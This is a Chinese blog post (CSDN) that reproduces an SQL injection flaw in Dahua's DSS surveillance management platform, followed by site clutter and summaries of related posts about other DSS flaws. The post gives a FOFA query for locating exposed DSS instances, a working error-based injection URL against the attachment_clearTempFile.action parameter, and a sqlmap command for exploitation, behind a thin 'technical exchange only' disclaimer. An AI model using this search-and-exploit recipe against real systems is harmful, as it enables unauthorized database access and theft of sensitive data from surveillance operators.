大华监控DSS存在SQL注入高危漏洞

cn_大腿

已于 2024-03-27 16:04:37 修改

阅读量862

点赞数 7

文章标签：安全

于 2024-03-27 16:01:45 首次发布

本文链接：https://blog.csdn.net/wan___she__pi/article/details/137080115

版权

声明：

本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

简介

大华DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。将视频监控、卡口拍照、区间测速、电子地图、违章查询系统等诸多主流应用整合，实现更加智能、便捷的分级查询服务。

大华 DSS 数字监控系统存在File.action SQL注入，黑客可以利用该漏洞执行任意SQL语句，获取敏感信息，造成危害。

资产搜索

fofa：

app="dahua-DSS"

漏洞复现

漏洞验证：

http://127.0.0.1/portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(11,CONCAT(0x7e,user(),0x7e))%20AND%20(%27ccC%27=%27ccC&bean.TabName=1

漏洞利用：

python3 sqlmap.py -u http://127.0.0.1/portal/attachment_clearTempFile.action?bean.RecId=1

输入不同参数，输出内容（以下为数据库）

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

cn_大腿

关注关注

7
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

【漏洞复现】大华DSS视频管理系统信息泄露漏洞

晚风不及你

02-20

2223

大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统，除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外，更注重用户使用的便利性。

【漏洞复现】大华DSS数字监控系统itcBulletin SQL注入漏洞

晚风不及你

03-06

1000

参与评论您还未登录，请先登录后发表或查看评论

视频监控汇聚平台：通过SDK接入大华DSS视频监控平台的源代码解释和分享

最新发布

weixin_70208651的博客

07-13

1480

视频监控接入汇聚平台是集成了视频资源接入、汇聚、存储、处理、分析、运维，旨在实现不同品牌、不同协议、不同型号的视频监控资源的统一接入、汇聚、存储、管理和应用。支持多种接入协议，如GB/T28181、RTSP、ONVIF、RTMP等协议及特定的协议，实现视频资源的集中管理和融合应用，并提供API接口。C++代码是大华DSS视频监控平台接入到AS-V1000的SDK代码的源代码函数，封装和大华DSS平台交互的网络SDK功能。类封装了一系列方法，用于登录、实时预览、回放控制、PTZ控制、报警设置等，以及成员变量。

大华 DSS 数字监控系统attachment_clearTempFile.action存在SQL注入漏洞

weixin_43167326的博客

03-20

1226

大华DSS（Digital Surveillance System）是一款功能强大的数字监控系统，广泛应用于各类安全监控场景。它采用先进的数字视频处理技术，能够实现高清、实时的视频监控，为安全管理提供了有力支持。大华DSS系统具有高度的灵活性和可扩展性，可根据实际需求配置不同的监控设备，满足不同场合的安全监控需求。同时，系统还支持远程监控和管理，用户可通过手机、电脑等终端设备随时查看监控画面，实时掌握现场情况。

大华 DSS 数字监控系统 attachment_getAttList.actionSQL注入漏洞

weixin_43167326的博客

02-08

567

大华DSS数字监控系统attachment_getAttList接口存在SQL注入漏洞，攻击者可以利用该漏洞获取数据库敏感信息。

大华 DSS 城市安防数字监控系统 SQL 注入漏洞

Keepb1ue的博客

12-21

1543

大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，可通过注入漏洞获取数据库敏感信息。

大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

holyxp的博客

12-18

2779

大华 DSs 数字监控系统是大华开发的一款安防视频监控系统，拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华 DSS存在SQL注入漏洞，攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包，利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如，管理员后台密码、站点的用户人人信息)之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限poc验证是否存在漏洞如果你想查询用户名和密码。

【漏洞复现】大华DSS数字监控系统getAttList SQL注入漏洞

晚风不及你

03-05

763

大华DSS数字监控系统 attachment_clearTempFile sql注入漏洞复现（含nuclei-POC）

m0_50797689的博客

03-19

836

大华DSS数字监控系统 attachment_clearTempFile sql注入漏洞复现（含nuclei-POC）

大华 DSS 数字监控系统 itcBulletin SQL 注入

weixin_43567873的博客

03-09

534

大华 DSS 数字监控系统 itcBulletin SQL 注入

大华科技摄像头产品非授权访问漏洞技术分析与防护方案

02-10

大华科技摄像头产品非授权访问漏洞技术分析与防护方案

某购物商城系统commodtiy接口处存在任意文件上传漏洞

weixin_43167326的博客

05-10

875

某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件，例如后门、木马或勒索软件，以获取对服务器的远程访问权限或者破坏系统，对服务器造成极大的安全隐患。

漏洞复现-大华dss struts2-045表达式注入漏洞（附漏洞检测脚本）

jjjj1029056414的博客

12-09

1657

漏洞复现大华dss struts2-045表达式注入漏洞，附带自己写的poc脚本

【复现】大华 DSS 数字监控系统 任意文件读取漏洞_38

fushuang333的博客

02-03

1367

【复现】大华 DSS 数字监控系统 任意文件读取漏洞，通过提交专门设计的输入，攻击者就可以在被访问的文件系统中读取或写入任意内容。

大华 DSS 数字监控系统 user_edit.action 信息泄露漏洞复现

0xSec

05-30

834

大华 DSS 数字监控系统 user_edit.action 接口处存在信息泄露漏洞。未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码等信息，破解密码后可直接登录后台，使系统处于极不安全的状态。

【复现】大华DSS信息泄露漏洞_15

fushuang333的博客

01-11

1657

【复现】大华DSS信息泄露漏洞，DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。

【漏洞复现】大华 DSS 数字监控系统 itcBulletin SQL 注入

失心少年

01-11

504

攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如，管理员后台密码、站点的用户人人信息)之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限## 免责声明。技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！

【漏洞复现】大华-城市安防监控系统平台管理-SQL注入-itcBulletin

知黑而守白

06-19

164

DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。可将视频监控、卡口拍照、区间测速、电子地图、违章查询系统等诸多主流应用整合在一起，实现更加智能、便捷的分级查询服务。大华DSS itcBulletin 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。